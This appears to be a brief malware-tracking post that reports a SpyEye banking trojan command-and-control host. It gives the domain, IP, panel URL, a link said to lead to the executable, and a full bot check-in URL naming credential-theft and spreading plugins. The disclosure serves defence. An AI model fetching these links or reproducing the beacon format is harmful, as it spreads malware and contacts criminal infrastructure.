forwardmotionconcepts.com(SpyEye banking trojan hosted in United States Dallas Softlayer Technologies Inc)

Remote Host Port Number
173.192.41.194 80

The data identified by the following URL was then requested from the remote web server:
http://forwardmotionconcepts.com/wip5/main/gate.php?guid=UserName!COMPUTERNAME!00CD1A40&ver=10299&stat=ONLINE&ie=6.0.2900.2180&os=5.1.2600&ut=Admin&plg=billinghammer;creditgrab;ftpbc;socks5;USBSpread&cpu=100&ccrc=0D98E50E&md5=fc5531793ca5bebd917e6ef85d709272

SpyEye Panel:
http://forwardmotionconcepts.com/wip5/main/

exe file:
http://9d0a7f4d.tinylinks.co

infos about hosting:
http://whois.domaintools.com/173.192.41.194

Categories: Uncategorized